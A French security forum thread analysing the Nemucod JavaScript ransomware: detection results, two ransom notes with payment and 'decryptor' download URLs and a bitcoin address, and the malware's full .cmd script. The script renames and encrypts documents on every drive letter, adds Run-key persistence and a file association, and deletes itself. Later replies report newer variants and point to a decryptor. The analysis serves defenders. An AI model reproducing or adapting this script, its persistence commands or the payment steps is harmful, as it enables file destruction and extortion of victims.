Ransomware Nemucod (Crypto-Ransomware)

Les malwares de type Ransomware et rançongiciels
Malekal_morte
Messages : 116656
Inscription : 10 sept. 2005 13:57

Ransomware Nemucod (Crypto-Ransomware)

par Malekal_morte »

Découvert le 17 mars par dvk01uk, ce Crypto-Ransomware (rançongiciel chiffreur de fichiers) vise essentiellement les systèmes d'exploitation Windows. Ce dernier est distribué à travers des emails malicieux contenant un JavaScript malicieux d'où nos recommandations de bloquer Windows Script Host : Comment se protéger des scripts malicieux sur Windows

Il s'agit donc ici d'un Ransomware JavaScript.

SHA256: 284cdca92a622afba59c6ee35a61871700e1dc8af63b1211e7e2e3ea2d0b83a1
Nom du fichier : 00000594685.doc.js
Ratio de détection : 12 / 57
Date d'analyse : 2016-03-13 09:50:12 UTC (il y a 3 jours, 21 heures) Voir les derniers

Antivirus Résultat Mise à jour
AhnLab-V3 JS/Nemucod 20160312
Arcabit HEUR.JS.Trojan.b 20160313
Cyren JS/Nemucod.D2!Eldorado 20160313
DrWeb SCRIPT.Virus 20160313
ESET-NOD32 JS/TrojanDownloader.Nemucod.IP 20160312
F-Prot JS/Nemucod.D2!Eldorado 20160313
Fortinet JS/Nemucod.IP!tr.dldr 20160313
Kaspersky HEUR:Exploit.Script.Generic 20160313
McAfee JS/Nemucod.dz 20160313
McAfee-GW-Edition JS/Nemucod.dz 20160312
Microsoft TrojanDownloader:JS/Swabfex.A 20160313
NANO-Antivirus Trojan.Script.ExpKit.easstb 20160313


Ce ransomware est distribué avec des trojans et notamment le Trojan Kovter, un malware FileLess
Une désinfection complète et changement de vos mots de passe est nécessaire.

La page contenant les instructions de paiement se nomme Decrypt.htm

Code : Tout sélectionner

Attention!
All your documents, photos, databases and other important personal files
were encrypted using strong RSA-1024 algorithm with a unique key.

Nobody can help you except us. It is useless to reinstall Windows,
use antiviruses, rename files, etc.

To unlock your files you have to make payment.

Please click one of the following links for details:

http://david.guiron.perso.sfr.fr/payment/ 
http://nueva.alite.eu/payment/ 
http://mkgy-becs.at/payment/ 
http://antalyadunyamevdeneve.com/payment/ 
http://scanf.noahsofts.com/payment/ 
ou encore :

Code : Tout sélectionner

ATTENTION!

All your documents, photos, databases and other important personal files
were encrypted using strong RSA-1024 algorithm with a unique key.
To restore your files you have to pay 0.26544 BTC (bitcoins).
Please follow this manual:

1. Create Bitcoin wallet here:

      https://blockchain.info/wallet/new

2. Buy 0.26544 BTC with cash, using search here:

      https://localbitcoins.com/buy_bitcoins

3. Send 0.26544 BTC to this Bitcoin address:

      15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ

4. Open one of the following links in your browser to download decryptor:

      http://evakuator-lska.com.ua/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ
      http://rpexpress.qc.ca/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ
      http://omergoksel.com/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ
      http://web.benzol.net.pl/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ
      http://cspfc.immo.perso.sfr.fr/counter/?ad=15TM1YLoufq5CYXAA3yzkrwGy93HfAP6tQ

5. Run decryptor to restore your files.

PLEASE REMEMBER:

      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
      - Nobody can help you except us.
      - It`s useless to reinstall Windows, update antivirus software, etc.
      - Your files can be decrypted only after you make payment.
      - You can find this manual on your desktop (DECRYPT.txt).
Image

Les fichiers chiffrés portent l'extension .crypted

Image

Code : Tout sélectionner

https://www.majorhector.com/offres/A87FF679/paiement.php

Le chiffrement des documents se fait à travers un fichier .cmd.
Ce dernier effectue une recherche de fichiers, renomme en .crypted et chiffre ensuite les documents.

[code]dir /B "C:\" && for /r "C:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "D:\" && for /r "D:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "E:\" && for /r "E:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "F:\" && for /r "F:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "G:\" && for /r "G:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "H:\" && for /r "H:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "I:\" && for /r "I:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "J:\" && for /r "J:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "K:\" && for /r "K:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "L:\" && for /r "L:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "M:\" && for /r "M:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "N:\" && for /r "N:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "O:\" && for /r "O:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "P:\" && for /r "P:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "Q:\" && for /r "Q:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "R:\" && for /r "R:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "S:\" && for /r "S:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "T:\" && for /r "T:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "U:\" && for /r "U:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "V:\" && for /r "V:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "W:\" && for /r "W:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "X:\" && for /r "X:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "Y:\" && for /r "Y:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
dir /B "Z:\" && for /r "Z:\" %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN "%%i" "%%~nxi.crypted" & call C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe "%%i.crypted")
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt"
REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt\""
copy /y "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt" "%AppData%\Desktop\DECRYPT.txt"
copy /y "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt" "%UserProfile%\Desktop\DECRYPT.txt"
copy /y "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt" "C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe"
del "C:\Users\VINCEN~1\AppData\Local\Temp\848371.exe"
del "C:\Users\VINCEN~1\AppData\Local\Temp\848371.cmd" & notepad.exe "C:\Users\VINCEN~1\AppData\Local\Temp\848371.txt"
Decrypter Nemucod

Prends le Nemucod Decryptor donné sur la page suivante : Outils de décryptage (Decrypt Tools Ransomware)
D'autres éditeurs proposent aussi des outils de récupération.

Rendez-vous sur la page :

Sécuriser son Windows

Afin de sécuriser son Windows et éviter les ransomwares et d'autres menaces connues sur la toile, suivre le tutoriel de sécurisation de son Windows.
=> Sécuriser son Windows.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116656
Inscription : 10 sept. 2005 13:57

Re: Ransomware Nemucod (Crypto-Ransomware)

par Malekal_morte »

Le Ransomware Nemucod est de retour début février 2017 avec l'extension .JSE :
Ransomware .jse (Nemucod)
Documents Office et pdf vers .jse

Les entreprises semblent visées.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116656
Inscription : 10 sept. 2005 13:57

Re: Ransomware Nemucod (Crypto-Ransomware)

par Malekal_morte »

de retour avec une nouvelle entrée startup :
Startup: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nuke.jse [2017-10-02] ()
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Ransomware »